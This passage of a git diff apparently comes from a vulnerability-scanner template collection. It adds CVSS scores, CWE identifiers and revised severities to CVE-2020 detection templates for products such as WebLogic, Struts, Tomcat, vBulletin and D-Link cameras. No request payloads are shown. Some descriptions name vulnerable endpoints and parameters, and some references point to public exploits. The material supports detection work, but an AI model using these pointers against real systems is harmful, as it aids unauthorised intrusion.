attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-14883 requests: - method: POST diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml index a40edb0ae6..3b46eec92a 100644 --- a/cves/2020/CVE-2020-15129.yaml +++ b/cves/2020/CVE-2020-15129.yaml @@ -7,6 +7,11 @@ info: description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios. reference: https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik tags: cve,cve2020,traefik,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.70 + cve-id: CVE-2020-15129 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml index 247fac361d..1d65d8a045 100644 --- a/cves/2020/CVE-2020-15148.yaml +++ b/cves/2020/CVE-2020-15148.yaml @@ -3,11 +3,17 @@ id: CVE-2020-15148 info: name: Yii 2 (yiisoft/yii2) RCE author: pikpikcu - severity: high + severity: critical reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md tags: cve,cve2020,rce,yii + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-15148 + cwe-id: CWE-502 + description: "Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory." requests: - method: GET diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 474fa19f0a..e483393043 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml @@ -3,7 +3,7 @@ id: CVE-2020-15227 info: name: Nette Framework RCE author: becivells - severity: high + severity: critical description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 @@ -11,6 +11,11 @@ info: - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md tags: cve,cve2020,nette,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 910bd856be..b197b0e2de 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 - https://github.com/maptiler/tileserver-gl/issues/461 tags: cve,cve2020,xss,tileserver + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-15500 + cwe-id: CWE-79 + description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml index 15ac2adc6c..1877acd2d4 100644 --- a/cves/2020/CVE-2020-15505.yaml +++ b/cves/2020/CVE-2020-15505.yaml @@ -16,6 +16,10 @@ info: - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - https://github.com/orangetw/JNDI-Injection-Bypass tags: cve,cve2020,mobileiron,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15505 requests: - raw: diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index 4a4140cb1c..7ae06a5513 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -7,6 +7,11 @@ info: description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ tags: cve,cve2020,terramaster,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15568 + cwe-id: CWE-913 requests: - raw: diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml index e0457058b0..983229407e 100644 --- a/cves/2020/CVE-2020-15920.yaml +++ b/cves/2020/CVE-2020-15920.yaml @@ -7,6 +7,11 @@ info: description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html tags: cve,cve2020,mida,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15920 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 12f3ac20ab..d94b86da6f 100644 --- a/cves/2020/CVE-2020-16139.yaml +++ b/cves/2020/CVE-2020-16139.yaml @@ -3,11 +3,15 @@ id: CVE-2020-16139 info: name: Cisco 7937G Denial-of-Service Reboot Attack author: pikpikcu - severity: low + severity: high description: | A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ tags: cve,cve2020,dos,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-16139 requests: - raw: diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml index 9cf24f5d88..372a0572b7 100644 --- a/cves/2020/CVE-2020-16846.yaml +++ b/cves/2020/CVE-2020-16846.yaml @@ -13,6 +13,11 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 tags: cve,cve2020,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-16846 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 495e9c38e7..f126ba25cf 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml @@ -3,13 +3,18 @@ id: CVE-2020-16952 info: name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE author: dwisiswant0 - severity: critical + severity: high description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. reference: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md tags: cve,cve2020,sharepoint,iis + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2020-16952 + cwe-id: CWE-346 requests: - method: GET diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index f448fae016..dc16edbe43 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -7,6 +7,11 @@ info: description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17362 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml index 17c80dd210..323ddb2eba 100644 --- a/cves/2020/CVE-2020-17453.yaml +++ b/cves/2020/CVE-2020-17453.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. tags: xss,wso2,cve2020,cve reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17453 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index bbcd6072f2..d6a5b88323 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -7,6 +7,11 @@ info: description: | vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. tags: cve,cve2020,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17496 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index c98ea1fe16..6e0d00f86d 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. tags: cve,cve2020,rce reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml index f22e184fd5..bc3ee60d1e 100644 --- a/cves/2020/CVE-2020-17506.yaml +++ b/cves/2020/CVE-2020-17506.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. tags: cve,cve2020 reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17506 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 8e59416072..86ff4d8977 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -3,12 +3,17 @@ id: CVE-2020-17518 info: name: Apache Flink Upload Path Traversal author: pdteam - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 description: | Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml index f1c9a162b0..5e386eed1f 100644 --- a/cves/2020/CVE-2020-17519.yaml +++ b/cves/2020/CVE-2020-17519.yaml @@ -7,6 +7,11 @@ info: description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. reference: https://github.com/B1anda0/CVE-2020-17519 tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index fbae086491..3e281da466 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,apache,rce,struts description: | Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17530 + cwe-id: CWE-917 requests: - method: GET diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml index 14c505aa53..e142920541 100644 --- a/cves/2020/CVE-2020-1938.yaml +++ b/cves/2020/CVE-2020-1938.yaml @@ -3,9 +3,15 @@ id: CVE-2020-1938 info: name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability author: milo2012 - severity: high + severity: critical reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 tags: cve,cve2020,apache,tomcat,lfi,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-1938 + cwe-id: CWE-269 + description: "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations." network: - inputs: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 021fb3e887..acc8e77e77 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2020,apache,xss reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-1943 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index 2a6dce0689..ba85b67fc6 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -4,8 +4,12 @@ info: author: geeknik description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. reference: https://github.com/oria/gridx/issues/433 - severity: high + severity: critical tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 requests: - method: GET diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 707e6c5343..aaf9f7972d 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -2,11 +2,16 @@ id: CVE-2020-2036 info: name: Palo Alto Networks Reflected XSS author: madrobot - severity: medium + severity: high description: > A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-2036 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 7a5e9b010c..b6c161b850 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -10,6 +10,11 @@ info: - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2096 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index e85004b3b3..4b25b87e1f 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml @@ -7,6 +7,11 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-21224 + cwe-id: CWE-88 requests: - method: POST diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 69eb751280..54be67bdf5 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -6,6 +6,11 @@ info: description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 69ef50972f..24f34dd46a 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -3,9 +3,18 @@ id: CVE-2020-22840 info: name: b2evolution CMS Open redirect author: geeknik - severity: low + severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. tags: cve,cve2020,redirect,b2evolution + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 requests: - method: GET diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml index 7430e804ef..ddd98b74b9 100644 --- a/cves/2020/CVE-2020-23517.yaml +++ b/cves/2020/CVE-2020-23517.yaml @@ -7,6 +7,11 @@ info: description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 5270160681..af1319821d 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -11,6 +11,11 @@ info: bypassed by changing Content-Type & name file too double ext. reference: https://www.exploit-db.com/exploits/49129 tags: cve,cve2020,joomla + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-23972 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24148.yaml b/cves/2020/CVE-2020-24148.yaml index 6723ab0df4..7b3b0a8eb0 100644 --- a/cves/2020/CVE-2020-24148.yaml +++ b/cves/2020/CVE-2020-24148.yaml @@ -9,6 +9,11 @@ info: description: | Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.10 + cve-id: CVE-2020-24148 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 13d8570a5b..20c73cd80d 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -7,6 +7,11 @@ info: description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index e5674758dd..6c887b906a 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -10,6 +10,11 @@ info: - https://sourceforge.net/projects/maracms/ # vendor homepage - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link tags: cve,cve2020,mara,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24223 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index ce90bb4046..8bd38792df 100644 --- a/cves/2020/CVE-2020-24312.yaml +++ b/cves/2020/CVE-2020-24312.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,wordpress,backups # Note: Manually check content + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index c85f31a04e..7634783769 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -7,6 +7,11 @@ info: description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. tags: cve,cve2020,redirect,episerver reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24550 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/cves/2020/CVE-2020-24571.yaml +++ b/cves/2020/CVE-2020-24571.yaml @@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 24b6fd03d9..b998f77f13 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -3,10 +3,15 @@ id: CVE-2020-24579 info: name: DLINK DSL 2888a RCE author: pikpikcu - severity: medium + severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24579 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml index 9b973fef67..58d1536129 100644 --- a/cves/2020/CVE-2020-24949.yaml +++ b/cves/2020/CVE-2020-24949.yaml @@ -7,6 +7,10 @@ info: description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt tags: cve,cve2020,phpfusion,rce,php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24949 requests: - method: GET diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml index 1789b5371c..7f8a7cfa59 100644 --- a/cves/2020/CVE-2020-25078.yaml +++ b/cves/2020/CVE-2020-25078.yaml @@ -7,6 +7,10 @@ info: description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink + classification: + cvss-metrics: 